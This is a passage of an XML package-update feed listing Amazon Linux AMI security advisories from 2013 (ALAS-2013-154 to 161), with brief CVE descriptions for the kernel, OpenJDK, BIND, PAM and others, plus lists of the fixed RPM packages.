arch="noarch"><filename>Packages/php-ZendFramework-Pdf-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Captcha" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Captcha-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Services" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Services-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Ldap" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Ldap-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Apc" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Apc-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Auth-Adapter-Ldap" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Auth-Adapter-Ldap-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-extras" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-extras-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Feed" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Feed-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo-Pgsql" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Pgsql-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Soap" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Soap-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-full" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-full-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Dojo" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Dojo-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Mysqli" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Mysqli-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Libmemcached" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Libmemcached-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo-Mssql" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Mssql-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-1.12.1-1.6.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-154</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-154: medium priority package update for kernel nvidia</title><issued date="2013-02-04 15:45:00" /><updated date="2014-09-15 22:27:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-0190:
896038:
CVE-2013-0190 kernel: stack corruption in xen_failsafe_callback()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0190" title="" id="CVE-2013-0190" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo-common-x86_64" version="3.2.37" release="2.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.2.37-2.47.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.2.37" release="2.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.2.37-2.47.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.2.37" release="2.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.2.37-2.47.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.2.37" release="2.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.2.37-2.47.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.37" release="2.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.2.37-2.47.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.2.37" release="2.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.2.37-2.47.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.2.37" release="2.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.2.37-2.47.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.2.37" release="2.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.2.37-2.47.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.2.37" release="2.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.2.37-2.47.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.2.37" release="2.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.2.37-2.47.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.2.37" release="2.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.2.37-2.47.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.37" release="2.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.2.37-2.47.amzn1.i686.rpm</filename></package><package name="kernel" version="3.2.37" release="2.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.2.37-2.47.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.2.37" release="2.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.2.37-2.47.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.2.37" release="2.47.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.2.37-2.47.amzn1.noarch.rpm</filename></package><package name="nvidia-kmod-3.2.37-2.47.amzn1" version="313.18" release="2012.09.0.amzn1" epoch="1" arch="x86_64"><filename>Packages/nvidia-kmod-3.2.37-2.47.amzn1-313.18-2012.09.0.amzn1.x86_64.rpm</filename></package><package name="nvidia" version="313.18" release="2012.09.0.amzn1" epoch="1" arch="x86_64"><filename>Packages/nvidia-313.18-2012.09.0.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-155</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-155: important priority package update for java-1.6.0-openjdk</title><issued date="2013-02-17 15:35:00" /><updated date="2014-09-15 22:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1478:
Multiple flaws were found in the way image parsers in the 2D and AWT components handled image raster parameters. A specially-crafted image could cause Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with the virtual machine privileges.
CVE-2013-0443:
It was discovered that the JSSE component did not properly validate Diffie-Hellman public keys. An SSL/TLS client could possibly use this flaw to perform a small subgroup attack.
CVE-2013-0442:
Multiple improper permission check issues were discovered in the AWT, CORBA, JMX, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-0440:
It was discovered that the SSL/TLS implementation in the JSSE component did not properly enforce handshake message ordering, allowing an unlimited number of handshake restarts. A remote attacker could use this flaw to make an SSL/TLS server using JSSE consume an excessive amount of CPU by continuously restarting the handshake.
CVE-2013-0435:
The default Java security properties configuration did not restrict access to certain com.sun.xml.internal packages. An untrusted Java application or applet could use this flaw to access information, bypassing certain Java sandbox restrictions. This update lists the whole package as restricted.
CVE-2013-0432:
A flaw was found in the AWT component's clipboard handling code. An untrusted Java application or applet could use this flaw to access clipboard data, bypassing Java sandbox restrictions.
CVE-2013-0427:
Multiple improper permission check issues were discovered in the Libraries, Networking, and JAXP components. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-0424:
It was discovered that the RMI component's CGIHandler class used user inputs in error messages without any sanitization. An attacker could use this flaw to perform a cross-site scripting (XSS) attack.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0424" title="" id="CVE-2013-0424" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0427" title="" id="CVE-2013-0427" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0432" title="" id="CVE-2013-0432" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0435" title="" id="CVE-2013-0435" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0440" title="" id="CVE-2013-0440" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0442" title="" id="CVE-2013-0442" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0443" title="" id="CVE-2013-0443" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1478" title="" id="CVE-2013-1478" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0245.html" title="" id="RHSA-2013:0245" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk" version="1.6.0.0" release="54.1.11.6.48.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-54.1.11.6.48.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="54.1.11.6.48.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-54.1.11.6.48.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="54.1.11.6.48.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-54.1.11.6.48.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="54.1.11.6.48.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-54.1.11.6.48.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="54.1.11.6.48.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-54.1.11.6.48.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="54.1.11.6.48.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-54.1.11.6.48.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="54.1.11.6.48.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-54.1.11.6.48.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="54.1.11.6.48.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-54.1.11.6.48.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="54.1.11.6.48.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-54.1.11.6.48.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="54.1.11.6.48.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-54.1.11.6.48.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="54.1.11.6.48.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-54.1.11.6.48.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="54.1.11.6.48.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-54.1.11.6.48.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-156</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-156: important priority package update for java-1.7.0-openjdk</title><issued date="2013-02-17 15:35:00" /><updated date="2014-09-15 22:31:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1478:
Multiple flaws were found in the way image parsers in the 2D and AWT components handled image raster parameters. A specially-crafted image could cause Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with the virtual machine privileges.
CVE-2013-0443:
It was discovered that the JSSE component did not properly validate Diffie-Hellman public keys. An SSL/TLS client could possibly use this flaw to perform a small subgroup attack.
CVE-2013-0442:
Multiple improper permission check issues were discovered in the AWT, CORBA, JMX, Libraries, and Beans components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-0440:
It was discovered that the SSL/TLS implementation in the JSSE component did not properly enforce handshake message ordering, allowing an unlimited number of handshake restarts. A remote attacker could use this flaw to make an SSL/TLS server using JSSE consume an excessive amount of CPU by continuously restarting the handshake.
CVE-2013-0435:
The default Java security properties configuration did not restrict access to certain com.sun.xml.internal packages. An untrusted Java application or applet could use this flaw to access information, bypassing certain Java sandbox restrictions. This update lists the whole package as restricted.
CVE-2013-0432:
A flaw was found in the AWT component's clipboard handling code. An untrusted Java application or applet could use this flaw to access clipboard data, bypassing Java sandbox restrictions.
CVE-2013-0431:
Multiple improper permission check issues were discovered in the JMX, Libraries, Networking, and JAXP components. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-0424:
It was discovered that the RMI component's CGIHandler class used user inputs in error messages without any sanitization. An attacker could use this flaw to perform a cross-site scripting (XSS) attack.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0424" title="" id="CVE-2013-0424" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0431" title="" id="CVE-2013-0431" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0432" title="" id="CVE-2013-0432" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0435" title="" id="CVE-2013-0435" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0440" title="" id="CVE-2013-0440" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0442" title="" id="CVE-2013-0442" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0443" title="" id="CVE-2013-0443" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1478" title="" id="CVE-2013-1478" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0247.html" title="" id="RHSA-2013:0247" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-devel" version="1.7.0.9" release="2.3.5.3.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.17.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.9" release="2.3.5.3.17.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.5.3.17.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.9" release="2.3.5.3.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.17.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.9" release="2.3.5.3.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.17.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.9" release="2.3.5.3.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.17.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.9" release="2.3.5.3.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.17.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.9" release="2.3.5.3.17.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.17.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.9" release="2.3.5.3.17.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.17.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.9" release="2.3.5.3.17.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.17.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.9" release="2.3.5.3.17.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.17.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.9" release="2.3.5.3.17.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-157</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-157: low priority package update for dhcp</title><issued date="2013-03-02 16:47:00" /><updated date="2014-09-15 22:31:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-3955:
A flaw was found in the way the dhcpd daemon handled the expiration time of IPv6 leases. If dhcpd's configuration was changed to reduce the default IPv6 lease time, lease renewal requests for previously assigned leases could cause dhcpd to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3955" title="" id="CVE-2012-3955" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0504.html" title="" id="RHSA-2013:0504" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="dhcp-common" version="4.1.1" release="34.P1.18.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-common-4.1.1-34.P1.18.amzn1.x86_64.rpm</filename></package><package name="dhclient" version="4.1.1" release="34.P1.18.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhclient-4.1.1-34.P1.18.amzn1.x86_64.rpm</filename></package><package name="dhcp" version="4.1.1" release="34.P1.18.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-4.1.1-34.P1.18.amzn1.x86_64.rpm</filename></package><package name="dhcp-debuginfo" version="4.1.1" release="34.P1.18.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-debuginfo-4.1.1-34.P1.18.amzn1.x86_64.rpm</filename></package><package name="dhcp-devel" version="4.1.1" release="34.P1.18.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-devel-4.1.1-34.P1.18.amzn1.x86_64.rpm</filename></package><package name="dhcp-debuginfo" version="4.1.1" release="34.P1.18.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-debuginfo-4.1.1-34.P1.18.amzn1.i686.rpm</filename></package><package name="dhcp-common" version="4.1.1" release="34.P1.18.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-common-4.1.1-34.P1.18.amzn1.i686.rpm</filename></package><package name="dhcp" version="4.1.1" release="34.P1.18.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-4.1.1-34.P1.18.amzn1.i686.rpm</filename></package><package name="dhclient" version="4.1.1" release="34.P1.18.amzn1" epoch="12" arch="i686"><filename>Packages/dhclient-4.1.1-34.P1.18.amzn1.i686.rpm</filename></package><package name="dhcp-devel" version="4.1.1" release="34.P1.18.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-devel-4.1.1-34.P1.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-158</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-158: medium priority package update for bind</title><issued date="2013-03-02 16:48:00" /><updated date="2014-09-15 22:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-5689:
A flaw was found in the DNS64 implementation in BIND when using Response Policy Zones (RPZ). If a remote attacker sent a specially-crafted query to a named server that is using RPZ rewrite rules, named could exit unexpectedly with an assertion failure. Note that DNS64 support is not enabled by default.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5689" title="" id="CVE-2012-5689" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0550.html" title="" id="RHSA-2013:0550" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-debuginfo" version="9.8.2" release="0.17.rc1.27.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.17.rc1.27.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.17.rc1.27.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.17.rc1.27.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.17.rc1.27.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.17.rc1.27.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.17.rc1.27.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.17.rc1.27.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.17.rc1.27.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.17.rc1.27.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.17.rc1.27.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.17.rc1.27.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.17.rc1.27.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.17.rc1.27.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.17.rc1.27.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.17.rc1.27.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.17.rc1.27.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.17.rc1.27.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.17.rc1.27.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.17.rc1.27.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.17.rc1.27.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.17.rc1.27.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.17.rc1.27.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.17.rc1.27.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.17.rc1.27.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.17.rc1.27.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.17.rc1.27.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.17.rc1.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-159</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-159: medium priority package update for gdb</title><issued date="2013-03-02 16:48:00" /><updated date="2014-09-15 22:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2011-4355:
GDB tried to auto-load certain files (such as GDB scripts, Python scripts, and a thread debugging library) from the current working directory when debugging programs. This could result in the execution of arbitrary code with the user's privileges when GDB was run in a directory that has untrusted content.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4355" title="" id="CVE-2011-4355" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0522.html" title="" id="RHSA-2013:0522" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gdb-debuginfo" version="7.2" release="60.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/gdb-debuginfo-7.2-60.13.amzn1.x86_64.rpm</filename></package><package name="gdb-gdbserver" version="7.2" release="60.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/gdb-gdbserver-7.2-60.13.amzn1.x86_64.rpm</filename></package><package name="gdb" version="7.2" release="60.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/gdb-7.2-60.13.amzn1.x86_64.rpm</filename></package><package name="gdb" version="7.2" release="60.13.amzn1" epoch="0" arch="i686"><filename>Packages/gdb-7.2-60.13.amzn1.i686.rpm</filename></package><package name="gdb-gdbserver" version="7.2" release="60.13.amzn1" epoch="0" arch="i686"><filename>Packages/gdb-gdbserver-7.2-60.13.amzn1.i686.rpm</filename></package><package name="gdb-debuginfo" version="7.2" release="60.13.amzn1" epoch="0" arch="i686"><filename>Packages/gdb-debuginfo-7.2-60.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-160</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-160: medium priority package update for pam</title><issued date="2013-03-02 16:48:00" /><updated date="2014-09-15 22:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2011-3149:
A denial of service flaw was found in the way the pam_env module expanded certain environment variables. If an application's PAM configuration contained "user_readenv=1" (this is not the default), a local attacker could use this flaw to cause the application to enter an infinite loop.
CVE-2011-3148:
A stack-based buffer overflow flaw was found in the way the pam_env module parsed users' "~/.pam_environment" files. If an application's PAM configuration contained "user_readenv=1" (this is not the default), a local attacker could use this flaw to crash the application or, possibly, escalate their privileges.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3148" title="" id="CVE-2011-3148" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3149" title="" id="CVE-2011-3149" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0521.html" title="" id="RHSA-2013:0521" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="pam" version="1.1.1" release="13.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam-1.1.1-13.20.amzn1.x86_64.rpm</filename></package><package name="pam-debuginfo" version="1.1.1" release="13.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam-debuginfo-1.1.1-13.20.amzn1.x86_64.rpm</filename></package><package name="pam-devel" version="1.1.1" release="13.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam-devel-1.1.1-13.20.amzn1.x86_64.rpm</filename></package><package name="pam-debuginfo" version="1.1.1" release="13.20.amzn1" epoch="0" arch="i686"><filename>Packages/pam-debuginfo-1.1.1-13.20.amzn1.i686.rpm</filename></package><package name="pam" version="1.1.1" release="13.20.amzn1" epoch="0" arch="i686"><filename>Packages/pam-1.1.1-13.20.amzn1.i686.rpm</filename></package><package name="pam-devel" version="1.1.1" release="13.20.amzn1" epoch="0" arch="i686"><filename>Packages/pam-devel-1.1.1-13.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-161</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-161: medium priority package update for dnsmasq</title><issued date="2013-03-02 16:49:00" /><updated date="2014-09-15 22:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-3411:
It was discovered that dnsmasq, when used in combination with certain libvirtd configurations, could incorrectly process network packets from network interfaces that were intended to be prohibited. A remote, unauthenticated attacker could exploit this flaw to cause a denial of service via DNS amplification attacks.
